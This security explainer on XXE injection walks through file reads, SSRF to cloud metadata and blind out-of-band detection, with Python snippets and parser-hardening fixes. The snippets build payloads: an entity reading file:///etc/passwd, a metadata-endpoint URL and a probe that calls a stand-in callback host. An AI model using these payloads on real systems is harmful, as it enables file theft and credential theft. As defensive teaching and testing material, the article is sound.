XXE (XML External Entity) injection lets attackers read files from a server, trigger server-side request forgery (SSRF), or cause denial of service by exploiting how XML parsers resolve external entity references. Many XML parsers have historically enabled external entity processing by default, and some still do, so any application that parses user-supplied XML should be treated as vulnerable until the parser is explicitly hardened.
Analysis Briefing
- Topic: XML External Entity injection mechanics and prevention
- Analyst: Mike D (@MrComputerScience)
- Context: A structured investigation kicked off by GPT-4o
- Source: Pithy Security
- Key Question: Why does uploading an XML file let attackers read your server’s password file?
Why XML Parsers Process External Entities by Default
XML 1.0 became a W3C Recommendation in 1998. It was designed to support rich document interchange, including references to external resources. External entities are a legitimate XML feature that lets one document include content from another file or URL. The capability is part of the core specification, and many parsers resolve such references unless told otherwise.
Parser vendors implemented the spec faithfully. Disabling external entity processing was left to application developers. Many developers are not aware the feature exists until they encounter a vulnerability report. The default-on behavior persisted for years across parser releases because changing it risks breaking backward compatibility, although some libraries have since switched to safer defaults.
The result is a vulnerability that is not a bug in the parser. It is the correct implementation of a dangerous default.
How Attackers Read /etc/passwd Through an XML Upload
A classic XXE payload targets any endpoint that accepts XML: document uploads, SOAP web services, SVG file processors, PDF generators that accept XML templates, and Excel file imports (which use XML internally).
The attacker submits a crafted XML document declaring an external entity that points to a local file. When the parser resolves the entity, it reads the file and substitutes its contents into the document. The application then returns the document or processes it in a way that includes the file contents in the response.
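The payload described above can be sketched in a few lines of Python. This is a minimal illustration, not a complete attack: the `order` and `note` element names and the `build_xxe_payload` helper are hypothetical, chosen only for the example. The parse step uses the standard library's ElementTree, which is documented not to expand external entities, so it shows what a safe parser does with the same input.

```python
import xml.etree.ElementTree as ET


def build_xxe_payload(system_id: str) -> str:
    """Return an XML document that declares an external entity.

    The element names are placeholders; a real target would expect
    its own schema.
    """
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE order [\n"
        f'  <!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        "<order><note>&xxe;</note></order>"
    )


payload = build_xxe_payload("file:///etc/passwd")

# A vulnerable parser would replace &xxe; with the file contents.
# ElementTree does not resolve the external entity and raises
# ParseError when it meets the reference.
try:
    ET.fromstring(payload)
    outcome = "parsed"
except ET.ParseError as exc:
    outcome = f"rejected: {exc}"

print(payload)
print(outcome)
```

Pointing `system_id` at a different URI is the only change needed to retarget the payload, which is why the file-read and SSRF variants are usually treated as the same bug.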
The same technique works for SSRF by pointing the external entity at an internal URL instead of a local file. Cloud environments are particularly exposed because the instance metadata endpoint at 169.254.169.254 is reachable from the instance itself. On AWS it can return temporary credentials for the instance's IAM role, particularly where the older IMDSv1, which requires no session token, is still enabled.
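When reviewing logged or test payloads, it can help to see at a glance what an entity's system identifier points at. The sketch below is one possible triage helper, assuming the identifier has already been extracted from the DOCTYPE; the function name and the category labels are made up for this example.

```python
import ipaddress
from urllib.parse import urlparse


def classify_entity_target(system_id: str) -> str:
    """Roughly classify where an external entity would send the parser."""
    parsed = urlparse(system_id)
    if parsed.scheme in ("", "file"):
        return "local-file"
    host = parsed.hostname
    if host is None:
        return "unknown"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A DNS name: it could resolve to anything, so flag it separately.
        return "hostname"
    if addr.is_link_local:
        # 169.254.0.0/16 includes the cloud metadata address.
        return "link-local"
    if addr.is_private or addr.is_loopback:
        return "internal-network"
    return "public-ip"


for target in (
    "file:///etc/passwd",
    "http://169.254.169.254/latest/meta-data/",
    "http://10.0.0.5:8080/admin",
):
    print(target, "->", classify_entity_target(target))
```

This only inspects the literal string. A hostname that resolves to an internal address would need a DNS lookup to classify, which the sketch deliberately avoids.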
When Blind XXE Leaks Data Without a Direct Response
Many applications parse XML without reflecting the parsed content back in the response. Blind XXE requires out-of-band exfiltration. The attacker points the external entity at an attacker-controlled server. The vulnerable application makes a DNS lookup or HTTP request to that server, confirming the vulnerability. Data can also leak through the URL itself, typically when parameter entities in an attacker-hosted DTD embed file contents in the outbound request.
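For testing your own endpoints, an out-of-band probe can be sketched as follows. This is an assumption-laden example: `oob.example.test` stands in for a callback domain you control, and the helper names are hypothetical. A unique token in the hostname lets you match an incoming DNS or HTTP hit to the request that caused it.

```python
import secrets
from typing import Iterable


def new_probe_token() -> str:
    """Random label used to tie a callback to one specific probe."""
    return secrets.token_hex(8)


def build_blind_xxe_probe(callback_host: str, token: str) -> str:
    """Return a document whose DTD references a parameter entity hosted
    on the callback domain. A parser that resolves it will contact
    <token>.<callback_host>."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE probe [\n"
        f'  <!ENTITY % oob SYSTEM "http://{token}.{callback_host}/xxe">\n'
        "  %oob;\n"
        "]>\n"
        "<probe/>"
    )


def probe_was_triggered(token: str, observed_hosts: Iterable[str]) -> bool:
    """Check hostnames seen by the callback server for this probe's token."""
    prefix = token.lower() + "."
    return any(host.lower().startswith(prefix) for host in observed_hosts)


token = new_probe_token()
print(build_blind_xxe_probe("oob.example.test", token))
```

How `observed_hosts` gets populated depends on the callback service in use, so that part is left out of the sketch.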
Tools like Burp Collaborator and interactsh automate out-of-band detection for blind XXE. A single request with a Collaborator URL as the external entity target confirms exploitability without requiring any response from the application.
The fix is usually a small configuration change in the parser. Disable external entity processing and, wherever possible, document type declarations (DTDs) entirely. Few modern applications need either.
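The exact call differs by parser, so the following is only one way to enforce a no-DTD policy, written with the Python standard library. It runs a first pass with `xml.parsers.expat` that aborts as soon as a DOCTYPE appears, then builds the tree with ElementTree. `parse_untrusted_xml` and `DTDForbidden` are names invented for this sketch; the third-party `defusedxml` package offers a maintained equivalent.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a document type declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    raise DTDForbidden(f"DOCTYPE declarations are not allowed (found {name!r})")


def parse_untrusted_xml(data: bytes) -> ET.Element:
    """Parse XML only if it contains no DTD at all.

    Rejecting the DOCTYPE removes external entities, parameter
    entities, and entity-expansion tricks in one step.
    """
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(data, True)  # propagates DTDForbidden from the handler
    return ET.fromstring(data)


root = parse_untrusted_xml(b"<order><note>hello</note></order>")
print(root.find("note").text)
```

Parsing twice is wasteful for large documents. It is done here only to keep the example short and free of third-party dependencies.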
What This Means For You
- Disable external entity processing explicitly in every XML parser your application uses, because many parsers enable it by default and the fix is usually a single configuration call.
- Audit every file upload endpoint that accepts XML, SVG, DOCX, or XLSX formats, since all of these use XML internally and are XXE attack surfaces if parsed server-side.
- Add XXE payloads to your security test suite, targeting your own upload and API endpoints before attackers find them during a real engagement.
- Check your SSRF exposure via XXE if your servers can reach cloud metadata endpoints, because a successful XXE-to-SSRF attack on AWS can return IAM role credentials in only a few requests.
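A regression check for the test-suite recommendation above might look like the sketch below. It assumes you can wrap the code path under test in a function that takes XML text and returns whatever the application would echo back; `leaks_file_via_xxe`, `render_with_stdlib`, and the canary value are all hypothetical names for this example. It uses a temporary canary file rather than a real system file so the test is safe to run anywhere.

```python
import os
import pathlib
import tempfile
import xml.etree.ElementTree as ET
from typing import Callable

CANARY = "xxe-canary-7f3a9c"


def leaks_file_via_xxe(render: Callable[[str], str]) -> bool:
    """Return True if `render` exposes a local file through an external entity."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    try:
        with os.fdopen(fd, "w") as handle:
            handle.write(CANARY)
        uri = pathlib.Path(path).resolve().as_uri()
        payload = (
            f'<!DOCTYPE doc [<!ENTITY xxe SYSTEM "{uri}">]>'
            "<doc>&xxe;</doc>"
        )
        try:
            output = render(payload)
        except Exception:
            # A parser that refuses the document did not leak anything.
            return False
        return CANARY in output
    finally:
        os.unlink(path)


def render_with_stdlib(xml_text: str) -> str:
    """Stand-in for the application code path under test."""
    return ET.tostring(ET.fromstring(xml_text), encoding="unicode")


print("leaks:", leaks_file_via_xxe(render_with_stdlib))
```

This only catches reflected XXE. Blind variants need an out-of-band listener, so a passing result here does not prove the parser is hardened.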
